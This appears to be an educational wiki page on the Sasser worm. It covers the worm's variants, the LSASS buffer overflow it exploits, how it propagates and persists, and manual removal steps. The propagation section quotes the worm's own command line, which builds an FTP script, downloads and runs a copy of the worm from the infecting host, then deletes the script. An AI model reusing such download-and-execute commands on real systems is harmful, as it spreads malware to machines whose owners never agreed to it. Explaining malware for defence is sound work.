4)+Sasser+Worm

media type="youtube" key="_d9Rl6SJmwk" width="558" height="417" align="center"

= What is Sasser Worm? =
 * Sasser is a computer worm that affects computers running vulnerable versions of the Microsoft operating system Windows XP and Windows 2000 and Windows Server 2003 platforms ****  . Sasser spreads by exploiting the system through a vulnerable network port . Meaning, it is particularly virulent in that it can spread without user intervention; however, it is also easily stopped by a properly configured firewall or by downloading system updates from Windows Updates.  **

= Versions of Sasser Worm =
 * 1) **Sasser A: Original.**
 * 2) **Sasser B: Uses a different file name (avserve2.exe). Creates a different value in the registry to account for the change in file name. Uses a different mutex (jobaka3).**
 * 3) **Sasser C: Changed the number of threads from 128 to 1024.**
 * 4) **Sasser D: Changed the number of threads back to 128 and used the ICMPSendEcho API to speed up scanning. Does not run on Windows 2000.**
 * 5) **Sasser E: Changed shell and FTP ports to 1022 and 1023 respectively. Also, pops up a message alerting the user of vulnerability to MS04-011. Does not run on Windows 2000.**
 * 6) **Sasser F: Repack of the Sasser A (original) - minor modification through hex-editor.**


 * The Spread of Sasser Worm over Other Worms **
 * Netsky and Bagel worms, for example, are based on emails and users opening email attachments. The worms get attached to an email which is forwarded to all email addresses they find in the infected system. This infection mechanism is not as efficient as that of Sasser. Sasser's approach looks up random public IP's in the network and gets spread to vulnerable systems without the need for users to interact with them (i.e. no need for a user to open an attachment). The self-reliant approach of Sasser makes it spread quicker than Netsky and Bagel worms. **

= What areas does it affect? =
 * The specific hole Sasser exploits is documented by Microsoft in its MS04-011 bulletin, for which a patch had been released seventeen days earlier. The computer usually automatically shuts itself down with an error message about LSASSE.exe. **
 * The patch from Microsoft known as the MS04-011 Security Update fixes the following vulnerabilities: **
 * **LSASS Vulnerability**
 * **LDAP Vulnerability**
 * **PCT Vulnerability**
 * **Winlogon Vulnerability**
 * **Metafile Vulnerability**
 * **Help and Support Center Vulnerability**
 * **Utility Manager Vulnerability**
 * **Windows Management Vulnerability**
 * **Local Descriptor Table Vulnerability**
 * **H.323 Vulnerability**
 * **Virtual DOS Machine Vulnerability**
 * **Negotiate SSP Vulnerability**
 * **SSL Vulnerability**
 * **ASN.1 “Double-Free” Vulnerability**


 * Download the Windows patches for the vulnerabilities by clicking on the links below:**
 * Windows XP and Windows XP Service Pack 1**
 * Windows 2000 Service Packs 2, 3, and 4**
 * You also can visit the following site for patches for Windows NT, [|Windows XP] 64-bit Edition, Windows Server 2003.**

= What exploits the attack can use? = __** Integers Overflow: **__** Because the computer systems have a finite amount of memory, malicious users can use special input to cause a carry overflow, which is when the result of a computation gets too large for the specified representation. This allows the malicious user to get special permissions or access special locations in memory and program areas. **

__** Characters (UTF-8 Encoding): **__** The UTF-8 Encoding of the Unicode character set can cause systems to represent a character by more than one representation (e.g. ASCII). This can be used to input specific and malicious content to programs or systems since the input validation may not protect against it. **

__ ** Buffer Overrun (or overflow): ** __** When the value assigned to a variable exceeds the size of the buffer allocated to it, This causes memory locations not allocated to this variable to be overwritten. This type of problem can lead the attacker to get special permissions, privileges and get access to special resources such as a shell. **

**How Does Sasser work?**
 * In general, Sasser worm infects computer systems to gain full control of these systems through a buffer overflow attack on the Local Security Authority Subsystem Service (LSASS). It then propagates to other vulnerable systems by scanning random IP addresses. **


 * When W32.Sasser.Worm runs, it installs a copy of itself as "AVSERVE.EXE" in the Windows folder. Then it changes the following registry entry so that it is executed every time the system is started: **


 * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\**
 * CurrentVersion\Run**
 * avserve.exe = %Windows%\avserve.exe**


 * Again, the user may not be the one who started the program but it was simply started automatically once the computer was compromised. Therefore, the user may not even be aware that anything is happening on the system.**


 * Then, the program finds out if the current system is infected or not by looking for the mutex "Jobaka3l" and depending on the results it decides to continue or stop the execution process.**


 * After that, the program uses the API "AbortSystemShutdown" to** ** hinder attempts to shut down, restart, or rebooting the computer **** . **


 * During the "API" time, the worm starts the following:**
 * **__ Look for other systems to infect: __ Once the worm has infected the system, it installs an //FTP server on TCP port 5554 (a p// // ort used to serve copies of the worm to other systems //**** //)//. The reason of this is to be able to serve a copy of the worm program to already (or about to be) exploited systems. Note that this will be one of the multiple infected computers that will be able to send the worm to other systems through this FTP server. **
 * **__ Find and attack vulnerable systems: __**
 * ** It starts 128 threads to scan vulnerable system. The threads loop through all addresses returned by "gethostbyname" function for the local hostname and tries to find all publicly routable internet addresses and targets them. If none are found then local addresses are targeted. **
 * ** The program sends a message to the computer to TCP port 445 (a port of attack of the worm  **** ). The message takes advantage of a vulnerability of the LSASS. The vulnerability of the LSASS allows the attacker to run remote code with system-level privileges. The buffer overflow problem exists in the Active Directory service functions exposed by the LSASS endpoints. Those functions provide the Active Directory services both locally and remotely with no special privileges required. The vulnerability exists in a logging function that uses the vsprintf routine which has no bounds checking. This means that if we pass a long enough string to it as parameter then we can cause a buffer overflow. Once this buffer overflow is obtained, 2KB of code can be executed on the remote host. **
 * __** Replicate itself on vulnerable systems: **__** Once a system has been breached, the malicious code opens a command shell on TCP port 9996 (a remote shell used by target systems to download the worm and get infected  ). The code instructs the computer to download and run the worm from the attacker's computer using the infected FTP server described. The following code is executed to achieve this: **


 * echo off&echo open [infecting machine's IP] 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get [rand]_up.exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&[rand]i_up.exe&echo off&del cmd.ftp&echo on **


 * The commands above, which are run on the target system, do the following: **
 * 1) ** Open TCP port 5554 to accept any FTP requests from infected systems **
 * 2) ** Download (through the "get" command) and execute a copy of the worm program. The program has the file name: [random_integer]_up.exe (e.g. 123_up.exe). **
 * 3) ** Delete the file: cmd.ftp, which includes all the instructions to download the worm through the ftp server. **


 * Finally, all the FTP transactions get stored in the file C:\WIN.LOG, which contains the number of systems it was able to infect and the IP address of the last infected system. **


 * The end result is that you will see a screen similar to the one below when you are infected, this will countdown to zero and literally shut down the system completely. The warning will state "This shutdown was initiated by NT AUTHORITY\SYSTEM". The message will state that the system process lsass.exe terminated unexpectedly. **
 * The message may be prefaced by another message:**


 * See the document below to learn a detailed step-by-step of how the Sasser worm works:**

media type="youtube" key="AR0zY945QLU" width="600" height="448" align="center"
 * The below video depicts how a Sasser worm functions:**

> **avserve.exe** > **avserve2.exe** > **skynetave.exe** > **any process running with the "_up.exe" suffix** > **"Protect my computer and network by limiting or preventing access to this computer from the Internet"** > **avserve.exe** > **avserve2.exe** > **skynetave.exe** > **C:\win2.log**
 * How Can I Remove the Sasser Worm? **
 * 1) Disconnect your computer from the local area network or Internet.**
 * 2) Terminate the running program:**
 * **Open the Windows Task Manager by either pressing CTRL+ALT+DEL, selecting the Processes tab or selecting Task Manager and then the process tab on WinNT/2000/XP machines.**
 * **Locate one of the following programs (depending on variation), click on it and End Task or End Process**
 * **Close Task Manager**
 * 3) Activate the Windows XP firewall (if running Windows XP) or another firewall to prevent the worm from shutting your system down while downloading the patches. To activate the Windows XP firewall, follow these steps:**
 * **Click on Start, Control Panel**
 * **Double-click on Networking and Internet Connections, then click on Network Connnections**
 * **Right-click on the connection you use to access the Internet and choose Properties**
 * **Click on the Advanced Tab and check the box**
 * **Click OK and close out of the Network and Control Panel**
 * 4) Download and Install the patches for the LSASS Vulnerability and others**
 * **[|Microsoft Windows NT Server 4.0 Service Pack 6a]**
 * **[|Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6]**
 * **[|Microsoft Windows 2000 Service Pack 2, Microsoft Windows 2000 Service Pack 3, and Microsoft Windows 2000 Service Pack 4]**
 * **[|Microsoft Windows XP and Microsoft Windows XP Service Pack 1]**
 * **[|Microsoft Windows XP 64-Bit Edition Service Pack 1]**
 * **[|Microsoft Windows XP 64-Bit Edition Version 2003]**
 * **[|Microsoft Windows Server™ 2003]**
 * **[|Microsoft Windows Server 2003 64-Bit Edition]**
 * 5) Remove the Registry entries**
 * **Click on Start, Run, Regedit**
 * **In the left panel go to** ** HKEY_LOCAL_MACHINE>Software>Microsoft>Windows>Current Version>Run **
 * ** In the right panel, right-click and delete the following entry **
 * "avserve.exe"="%Windir%\avserve.exe" **
 * "avserve2.exe"="%Windir%\avserve2.exe" **
 * "skynetave.exe"= "%Windows%\skynetave.exe" **
 * **Close the Registry Editor**
 * 6) Delete the infected files (for Windows ME and XP remember to [|turn off System Restore] before searching for and deleting these files to remove infected backed up files as well)**
 * **Click Start, point to Find or Search, and then click Files or Folders.**
 * **Make sure that "Look in" is set to (C:\WINDOWS).**
 * **In the "Named" or "Search for..." box, type, or copy and paste, the file names:**
 * **Click Find Now or Search Now.**
 * **Delete the displayed files.**
 * **Empty the Recycle bin**
 * 7) Reboot the computer and [|update your antivirus software], and run a thorough virus scan using your favorite antivirus program.**
 * For Automatic Removal of Sasser, download the [|Symantec removal tool], you will still need to download the patches above and install them, however this removal tool will stop the Sasser worm from running, remove the items in the registry, and delete the infected files.**